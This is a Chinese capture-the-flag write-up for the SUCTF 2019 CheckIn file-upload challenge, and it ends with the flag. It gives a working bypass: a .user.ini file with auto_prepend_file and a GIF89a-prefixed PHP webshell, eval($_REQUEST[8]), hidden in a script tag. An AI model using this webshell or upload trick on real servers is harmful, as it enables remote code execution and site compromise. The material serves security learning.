BUUCTF闯关日记--[SUCTF 2019]CheckIn1()

这题依旧不是自己做出来的,难过的是没做出来,值得高兴的是掌握了新姿势

进入页面叫你上传文件,肯定就是文件上传漏洞,所以我就开始逐个试

1. 发现.htaccess文件传不了

2. 含有 <? 的文件传不了

首先先解决第一个问题:

一.如果.htaccess文件传不了以我现有的知识只有两个方法:

1.传输.jpg文件,但是内容只含有一句话木马,可以直接连接菜刀

2.依靠CGI解析漏洞,简单来说就是原来访问1.jpg是图片,但是访问1.jpg/.php就是php文件了

但是现有知识解决不了,于是有一个新的姿势:

那就是.user.ini文件(这也是一种配置文件)

这个文件有什么用呢,就是把你指定的文件当作php执行

---------------------------------------------------

那么第二个问题:

<?文件 不能传

试试这样 写一句话木马:

<script language='php'>eval($_REQUEST[8]);</script>

---------------------------------------------------

于是解决这两个问题,可以开始解题

这是.user.ini的文件内容:

GIF89a
auto_prepend_file=shell.jpg(你传入的木马图片的名称)

这是shell.jpg的内容

GIF89a
<script language='php'>eval($_REQUEST[8]);</script>

然后分别把两个文件上传

然后访问uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php让他解析我们的文件

再访问uploads/cc551ab005b2e60fbdc88de809b2c4b1

可以发现

于是就可以连接菜刀,拿到flag 

 

flag{ccde253f-d5ba-4742-9bce-40624c4af6a5}

 

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值